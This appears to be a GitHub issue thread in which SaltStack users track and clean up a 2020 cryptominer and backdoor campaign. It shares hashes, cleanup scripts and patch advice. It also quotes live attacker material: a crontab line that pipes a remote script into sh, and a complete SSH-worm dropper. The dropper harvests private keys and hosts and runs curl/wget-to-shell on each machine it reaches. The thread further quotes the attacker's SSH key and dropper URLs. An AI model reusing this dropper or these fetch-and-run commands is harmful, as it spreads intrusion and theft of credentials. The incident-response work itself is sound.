Everyone, I updated my message. Remove "invite" from the end of the link.
After entering your email, you may have to wait a moment to be accepted by the channel admins (I am not an admin).
New channel is #salt-store-miner-public . No need to DM me for permission anymore!
Cheers!
Found just now in crontab:
wget -q -O - http://54.36.185.99/c.sh | sh > /dev/null 2>&1
Don't forget to check your crontab!
cd /var/spool/cron/crontabs/ && grep . *
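Note that /var/spool/cron/crontabs is the Debian-style path; on RHEL/CentOS the per-user crontabs sit directly in /var/spool/cron, and the system cron locations are worth sweeping too. A quick check covering both layouts (paths assumed, adjust for your distro):
# sweep per-user crontabs (Debian and RHEL layouts) plus system cron entries
grep -r . /var/spool/cron/ 2>/dev/null
grep -r . /etc/cron.d/ /etc/crontab 2>/dev/null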
Note! The dropper appears to have been updated: hxxp://89.223.121.139/sa.sh
salt-store malware has been modified, the new MD5 hash is: 2c5cbc18d1796fd64f377c43175e79a3
Which is downloaded from: hxxps://bitbucket.org/samk12dd/git/raw/master/salt_storer and hxxp://413628.selcdn.ru/cdn/salt-storer
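If you want to check whether a host has this variant, compare the hash yourself (this assumes the binary path /var/tmp/salt-store reported elsewhere in this thread):
# should NOT print 2c5cbc18d1796fd64f377c43175e79a3 on a clean host
md5sum /var/tmp/salt-store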
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
They took it down hours ago, actually.
I cannot stress enough how important it is that, if you're reading this thread now, you fix it NOW! The malware is improving in real time. Join the Slack channel (links above) for help removing it before it's too late!
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
If your system runs AppArmor, create two empty profiles so the malware won't even be able to execute normally:
salt "*" cmd.run "echo 'profile salt-store /var/tmp/salt-store { }' | tee /etc/apparmor.d/salt-store"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-store"
salt "*" cmd.run "echo 'profile salt-minions /tmp/salt-minions { }' | tee /etc/apparmor.d/salt-minions"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-minions"
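To verify the empty profiles actually loaded on the minions, a quick sanity check (assumes aa-status ships with your AppArmor install):
salt "*" cmd.run "aa-status | grep salt"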
@Talkless Thanks. The script does disable apparmor though, using a shell script run by salt-minion, so I don't think that will help unless you've already patched your salt-master and restarted it. And if you've done that, you'll also need to re-enable apparmor and delete the binaries anyway. Probably still worth doing!
unless you've already patched your salt-master and restarted it.
Well of course.
The awesome part is, the official SaltStack docker repos don't have the fix pushed yet: https://hub.docker.com/r/saltstack/salt/tags
A diff of an /etc backup against the current /etc shows these two new files:
Only in /etc/: ld.so.cache
Only in /etc/selinux: config
what's the patch version for this fix?
There are official packages for 2019.2.x (2019.2.4) and 3000.x (3000.2).
There are also patches available for versions all the way back to 2015.8.10 found here: https://www.saltstack.com/lp/request-patch-april-2020/
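If you're not sure which of those applies to you, check your current versions first (test.version is the stock Salt execution module for this):
salt-master --version
salt "*" test.version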
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
Could we have a public gist or something?
I have written this script to clean up most of the damage known to me: https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6
Please note that this might not be complete and that, as Mike in Slack put it, the absence of known fingerprints at this point does not mean that affected hosts are secure.
minions:
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
master:
yum update salt-master
systemctl restart salt-master
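For Debian/Ubuntu masters, the equivalent of the yum commands above would presumably be (assuming the official SaltStack apt repo is already configured):
sudo apt-get update
sudo apt-get install --only-upgrade salt-master
sudo systemctl restart salt-master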
This is working. @aTastyCookie Thank you very much.
I'm also wondering: having cleared these back-doors and upgraded/patched the master node, is there anything extra we should do?
It's worth being very clear about this -- if you had a Salt process running as root, an attacker effectively had root-level access to the system(s) in question. In this thread, there have been descriptions of known attacks but there may also be attacks circulating which do not match the same fingerprints as those so far described.
I emphasize that there is no evidence of this at present, but at a minimum, anyone affected by this exploit should consider information disclosure, remote back-doors, ransomware, and other attack vectors as possible, though, as mentioned, none of these have yet been seen or reported.
Critical Vulnerability in Salt Requires Immediate Patching https://www.securityweek.com/critical-vulnerability-salt-requires-immediate-patching
You can test if your salt master needs to be patched like so:
curl -X POST -F 'ip=your.saltmaster.ip.address' https://saltexploit.com/test
If it does, it will create /tmp/HACKED.txt on your master (it leaves your minions alone and has no other side effects); if not, it won't.
😂 Letting a random site know the IP of your publicly exposed salt-master is a very very bad idea. Don't do that. If you have a public salt master, firewall it off the internet immediately.
If you want to verify whether you need to patch, do it offline with the check script from here: https://github.com/rossengeorgiev/salt-security-backports
Oh yeah, I agree completely @rossengeorgiev. Don't trust me at all. Very bad idea. Don't do it. But it works xD
In all seriousness though, I am tying my reputation to not abusing that service, though. So yeah. I'm sure some in the slack channel can attest to that. Take that as you will. I promise I'm not keeping any IP addresses. Pinky swear? I did have 2 strangers in the slack channel audit me, but I can't offer any proof of that either, so...
Site has been updated to point to the offline checker and recommend that over the web one.
@here for anyone who is cleaning up their environment and is worried about potentially compromised salt pub/priv key pairs: https://github.com/dwoz/salt-rekey
We're putting together some information that should be released later today for those that need some help/don't already have a dedicated team.
In case it's not already obvious by this point:
When we get our post live we'll drop it here. In the interim, everyone has been amazing in the #salt-store-miner-public channel on the community Slack :black_heart: :black_heart: :black_heart: :black_heart:
Thanks @waynew. I'm continuing to update my gist and saltexploit.com with all the information I have.
FYI: we sacrificed one host as a honeypot to watch for any developments. There seems to be an update to the hack.
/tmp/salt-minions is now kept alive by scripts in /tmp/.ICEd-unix. Don't be fooled: /tmp/.ICE-unix (without the 'd') is a valid directory.
There is also a script which, at first glance, tries to dig deeper into your infrastructure using your own SSH keys:
#!/bin/sh
localgo() {
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://176.31.60.91/s2.sh|sh; sudo wget -q -O - http://176.31.60.91/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://176.31.60.91/s2.sh|sh; wget -q -O - http://176.31.60.91/s2.sh|sh;"
done
done
done
done
}
localgo
Hope it helps someone.
After looking further through one of my affected machines, I found a dropper script file. The script tries to find any SSH private keys and copies itself to any SSH hosts it finds in users' shell histories / SSH configs.
Both the initial script and the downloaded infection script can be found in an impromptu repo I made: https://github.com/Aldenar/salt-malware-sources/tree/master
DO NOT run any of the scripts. They are live, and will infect your system!
@Aldenar this is a serious development. Where was this file placed?
It also adds a key to /root/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5MixCXoPdUXwM3IsGd2005bIgazuNL4Y5fxANuahqLia7w28hm9FoBYqkjNQ9JHFEyP0g3gFp94nZzw+mQSJPSeTPKBX0U9B1G4Pi/sTNVDknJjjiQ3sOmJ0AN8JLPC/5ID05h/vMISZ9N/dp36eLV1Z0xSUBC/bddglU3MtdWKI8QLQefQpi5v9tZ2bgBUPA+unsnRA6tn30S/3XS+E9kaE4oMz9P0Yg5aLYc7XMoDVdUSfP8u4LpG1ByLrqAB3cRrU0AndV++e+uBu61boQ5vACHhcqq66b+Vk+9JmvdlT+n+PbNwmJNcFwSLF12fFBoF/
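If that key is present, you can strip it out; a minimal sketch (the sed pattern is a unique substring of the rogue key above; check other users' authorized_keys files too):
# remove the attacker's key from root's authorized_keys
# if sed fails, the file may have the immutable bit set: chattr -i /root/.ssh/authorized_keys
sudo sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5Mix/d' /root/.ssh/authorized_keys
# look for the same key under other users
sudo grep -l 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5Mix' /home/*/.ssh/authorized_keys 2>/dev/null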
@Foobartender or @frenkye, can you tell me what the full path of the dropper is?
Hi guys, same issue here, with version 4 of the malware; see https://saltexploit.com/ and compare the md5sum of /tmp/salt-minions.
Cleaned up with:
# Script taken from
# https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6#file-cleanup-sh
# Crontab entries deleted, check only
sudo crontab -l | grep 'http://'
# sudo crontab -l | sed '/54.36.185.99/d' | sudo crontab -
# sudo crontab -l | sed '/217.8.117.137/d' | sudo crontab -
#
# Delete and kill malicious processes
sudo kill -9 $(pgrep salt-minions)
sudo kill -9 $(pgrep salt-store)
sudo rm -f /tmp/salt-minions
sudo rm -f /var/tmp/salt-store
sudo kill -9 $(pgrep -f ICEd)
sudo rm -rf /tmp/.ICE*
sudo rm -rf /var/tmp/.ICE*
sudo rm /root/.wget-hsts
# create apparmor profiles to prevent execution
echo 'profile salt-store /var/tmp/salt-store { }' | sudo tee /etc/apparmor.d/salt-store
sudo apparmor_parser -r -W /etc/apparmor.d/salt-store
echo 'profile salt-minions /tmp/salt-minions { }' | sudo tee /etc/apparmor.d/salt-minions
sudo apparmor_parser -r -W /etc/apparmor.d/salt-minions
# reenable nmi watchdog
sudo sysctl kernel.nmi_watchdog=1
echo '1' | sudo tee /proc/sys/kernel/nmi_watchdog  # sudo doesn't apply to shell redirects, so use tee
sudo sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
# disable hugepages
sudo sysctl -w vm.nr_hugepages=0
# enable apparmor
sudo systemctl enable apparmor
sudo systemctl start apparmor
# fix syslog
sudo touch /var/log/syslog
sudo systemctl restart rsyslog
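After the cleanup, it may be worth confirming nothing respawned (the absence of these is not proof of a clean host, as noted above):
# check for surviving miner processes and watchdog scripts
ps aux | grep -E 'salt-(store|minions)|\.ICEd' | grep -v grep
# note: /tmp/.ICE-unix (no 'd') is a legitimate X11 socket directory
ls -la /tmp/.ICEd-unix /var/tmp/.ICE* 2>/dev/null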
I uploaded this script to a different web server and then ran a script similar to this example:
#!/bin/bash
ADDRESS=( 1.2.3.4
5.6.7.8
9.10.11.12
)
function my-ssh() {
ssh -i ~/.ssh/ec2.pem -l ubuntu "$@"
}
for server in "${ADDRESS[@]}"
do
echo "$server"
my-ssh "$server" 'wget -q -O - https://myserver/kill_salt.sh | bash -x -v'
done
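If your salt-master is already patched and trusted again, the same cleanup could be pushed through Salt itself instead of looping over SSH; a minimal sketch, reusing the placeholder URL from the example above:
salt "*" cmd.run 'wget -q -O - https://myserver/kill_salt.sh | bash'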
I found another script fetched from hxxp://176.104.3.35/?<id>: 1234.txt
@Foobartender is this the file exactly as you fetched it?
@taigrr It was in /tmp/.ICEd-unix/. The script had a completely random name, with no suffix to indicate the file type.
There are also patches available for versions all the way back to 2015.8.10 found here: https://www.saltstack.com/lp/request-patch-april-2020/
Putting patches behind some sort of sign-up wall requesting personal information isn't exactly classy. Just seems like a way to further annoy users after a major security issue.
@jblac No, I added two obvious lines on top for safety.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the cron job: hxxps://pastebin.com/UDykbnpU. A few DNS requests were made to pool.minexmr.com. Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM, with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp. And finally, here is a list of all Go source files: hxxps://pastebin.com/FMu6HfsK
The other one's much nastier. Make sure to clean ALL crontabs in /var/spool/cron, not just the root user's.
What would be "the other ones"?
Newer versions if you didn't get to it in time.
One's, not ones. I meant the salt-store remote shell. I dumped its memory as well, but nothing interesting popped up, since it doesn't have many hardcoded strings and is probably obfuscated. I could find a sorted array of ASCII characters. I did not perform any more detailed analysis of the disassembly, so the information is of limited value, but I posted it anyway just in case.
@taigrr - please add me to the Slack channel. Thank you for setting it up.
@sdreher It's public, see saltexploit.com
For people who still need to use SaltStack but temporarily lack confidence in it: https://github.com/saltstack/salt/issues/57088
Here is the original sa.sh script downloaded onto our Salt instance: https://file.io/h0dXR3W9
So, I've found some additional files that appear to have been dropped.
On the salt-master: /usr/local/lib/liblmvi.so (sha256:2984033766ce913cdf9b7ee92440e7e962b5cb5b90f7d1034f69837f724990ee)
VirusTotal doesn't seem to detect it as malicious. It adds this path to /etc/ld.so.preload.
On both the minions and the master, I've found that some of the dropped files can't be deleted because the immutable attribute is set. This one-liner helped to locate them:
lsattr -aR .//. 2>/dev/null | sed -rn '/i.+\.\/\/\./s/\.\/\///p'
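Once located, the immutable bit has to be cleared before the files can be removed, e.g. (the paths are the ones reported in this thread; substitute whatever the one-liner finds):
# clear the immutable attribute, then delete
sudo chattr -i /tmp/salt-minions /var/tmp/salt-store
sudo rm -f /tmp/salt-minions /var/tmp/salt-store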
In addition, I've found that /etc/hosts had been edited with extra entries for bitbucket.org.
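To spot the poisoned entries quickly:
grep -n 'bitbucket' /etc/hosts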
In case somebody needs this, I used these commands to do a quick fix on affected systems:
killall -9 salt-store;
rm -f /tmp/salt*;
rm -f /var/tmp/salt*;
rm /usr/bin/salt-store;
kill -9 $(pgrep -f ICEd);
rm -rf /tmp/.ICE*;
rm -rf /var/tmp/.ICE*;
rm /root/.wget-hsts;
sed -i '/bitbucket.org$/d' /etc/hosts;
rm /usr/local/lib/*.so; # as far as I know there should not be any legitimate .so but check it before running
rm /etc/ld.so.preload;
ldconfig;
sed -i '/kernel.nmi_watchdog=0$/d' /etc/sysctl.conf;
rm /etc/selinux/config; #if you do not use custom selinux config
touch /var/log/syslog;
service rsyslog restart;
rm /etc/salt/minion.d/_schedule.conf;
systemctl stop salt-minion;
rm /etc/salt/pki/minion/*; #need to regenerate salt keys
rm /var/tmp/rf /var/tmp/temp3754r97y12
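Since the commands above wipe the keys in /etc/salt/pki/minion, the master has to be rekeyed as well; a sketch with the stock salt-key tool ('<minion-id>' is a placeholder, and the salt-rekey tool linked earlier automates this):
# on the master: remove the old, possibly compromised key
salt-key -d '<minion-id>' -y        # or: salt-key -D -y  (deletes ALL accepted keys)
# on each minion: restart so a fresh keypair is generated and submitted
systemctl restart salt-minion
# back on the master: compare fingerprints before accepting
salt-key -f '<minion-id>'
salt-key -a '<minion-id>' -y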
I haven't seen this mentioned before, but I found this file trying to periodically run Salt:
rm /etc/salt/minion.d/_schedule.conf;
Also check /etc/cron.d for strange files, usually with a random 4-5 letter name.
@MartinMystikJonas: please don't try to salvage systems at this point. Start fresh.
/etc/salt/minion.d/_schedule.conf: this file is fine. Please read the documentation if you're confused about what it is.
Everyone else: that helper script may be enough to calm the cryptominer down and free up CPU cycles so you can pull data off your boxes, but please remember all your SSH keys and secrets were probably stolen, and you have no way to know what's lingering.
If you have any other questions, please visit saltexploit.com or visit the slack channel (directions also on saltexploit.com)
Hi @wavded,
Can you please share the path of the logs you mention below? Appreciate it. Thanks.
Regards, SC
In our experience, we had one job that was executed that did the following on each server according to the logs:
Firewall stopped and disabled on system startup
kernel.nmi_watchdog = 0
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys
grep: Trailing backslash
grep: write error: Broken pipe
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: docker: not found
sh: 500: docker: not found
sh: 501: docker: not found
sh: 502: docker: not found
sh: 503: docker: not found
sh: 504: docker: not found
sh: 505: docker: not found
sh: 506: setenforce: not found
apparmor.service is not a native service, redirecting to systemd-sysv-install
Executing /lib/systemd/systemd-sysv-install disable apparmor
insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S).
insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty).
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to execute operation: No such file or directory
P NOT EXISTS
md5sum: /var/tmp/salt-store: No such file or directory
salt-store wrong
--2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store
Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16687104 (16M) [application/octet-stream]
Saving to: '/var/tmp/salt-store'
2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104]
8ec3385e20d6d9a88bc95831783beaeb salt-store OK
@suhaimi-cyber4n6 it's on the salt-master. Look in the cachedir for saltstack (usually /var/cache/salt/master/jobs). Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
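A couple of ways to poke at that cache (default paths and the stock jobs runner assumed; <jid> is a placeholder):
# raw job cache on disk
sudo ls /var/cache/salt/master/jobs
# or via the jobs runner
salt-run jobs.list_jobs
salt-run jobs.lookup_jid <jid>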
Thank you very much @taigrr . I really appreciate it. :)
Description: All my servers with salt-minion installed suddenly started running an unknown program today: /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91
Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie
Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers
Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef | grep 27061 | grep -v grep
root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
salt-minion version: 2018.3.2; system: CentOS release 6.5 (Final)